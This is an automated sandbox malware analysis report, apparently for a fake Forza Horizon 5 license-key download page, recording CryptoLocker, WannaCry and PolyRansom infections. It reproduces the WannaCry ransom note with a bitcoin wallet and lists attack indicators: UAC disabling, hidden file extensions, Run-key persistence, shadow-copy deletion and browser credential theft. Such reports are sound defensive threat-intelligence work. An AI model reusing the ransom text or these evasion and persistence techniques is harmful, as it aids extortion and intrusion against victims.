cryptolocker | hxxps://getintopc[.]io/forza-horizon-5-license-key-apk/

Analysis

max time kernel
984s
max time network
1068s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-11-2024 00:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://getintopc.io/forza-horizon-5-license-key-apk/

Score

10^/10

cryptolocker wannacry defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

CryptoLocker
Ransomware family with multiple variants.
ransomware cryptolocker
Cryptolocker family
cryptolocker

Modifies visibility of file extensions in Explorer 2 TTPs 41 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 41 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4D2A.tmp	WannaCrypt0r.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4D41.tmp	WannaCrypt0r.exe

Executes dropped EXE 64 IoCs

pid	Process
6116	CryptoLocker.exe
2060	{34184A33-0407-212E-3320-09040709E2C2}.exe
1936	{34184A33-0407-212E-3320-09040709E2C2}.exe
6780	WannaCrypt0r.exe
6592	taskdl.exe
7676	@[email protected]
7760	@[email protected]
464	taskhsvc.exe
8104	taskse.exe
8124	taskdl.exe
8112	@[email protected]
7036	taskdl.exe
7348	taskse.exe
5180	@[email protected]
7408	taskdl.exe
7144	taskse.exe
7424	@[email protected]
7728	taskse.exe
840	@[email protected]
7848	taskdl.exe
8068	PolyRansom.exe
2368	bcAYYIgE.exe
6716	zCEMUIgE.exe
7500	PolyRansom.exe
6768	PolyRansom.exe
7408	PolyRansom.exe
7568	PolyRansom.exe
7892	PolyRansom.exe
396	PolyRansom.exe
6328	PolyRansom.exe
6768	PolyRansom.exe
7596	PolyRansom.exe
7272	PolyRansom.exe
3796	PolyRansom.exe
5752	PolyRansom.exe
6348	PolyRansom.exe
1492	PolyRansom.exe
6600	PolyRansom.exe
6728	PolyRansom.exe
3472	PolyRansom.exe
5536	PolyRansom.exe
6800	PolyRansom.exe
8156	PolyRansom.exe
1880	PolyRansom.exe
396	PolyRansom.exe
6688	PolyRansom.exe
6768	PolyRansom.exe
2272	PolyRansom.exe
6176	PolyRansom.exe
6236	PolyRansom.exe
7484	PolyRansom.exe
6688	PolyRansom.exe
6684	PolyRansom.exe
5320	PolyRansom.exe
8152	taskse.exe
6728	@[email protected]
7376	taskdl.exe
7244	PolyRansom.exe
2868	PolyRansom.exe
8164	PolyRansom.exe
7892	PolyRansom.exe
7836	PolyRansom.exe
7500	PolyRansom.exe
8020	PolyRansom.exe

Loads dropped DLL 7 IoCs

pid	Process
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4876	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe"	{34184A33-0407-212E-3320-09040709E2C2}.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\venvihjxkwgcrv581 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\bcAYYIgE.exe = "C:\\Users\\Admin\\DSgIcIgE\\bcAYYIgE.exe"	PolyRansom.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zCEMUIgE.exe = "C:\\ProgramData\\yGIYoQMg\\zCEMUIgE.exe"	PolyRansom.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\bcAYYIgE.exe = "C:\\Users\\Admin\\DSgIcIgE\\bcAYYIgE.exe"	bcAYYIgE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zCEMUIgE.exe = "C:\\ProgramData\\yGIYoQMg\\zCEMUIgE.exe"	zCEMUIgE.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	raw.githubusercontent.com
181	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCrypt0r.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 3 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\CryptoLocker.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCrypt0r.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\PolyRansom.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CryptoLocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PolyRansom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	msedge.exe
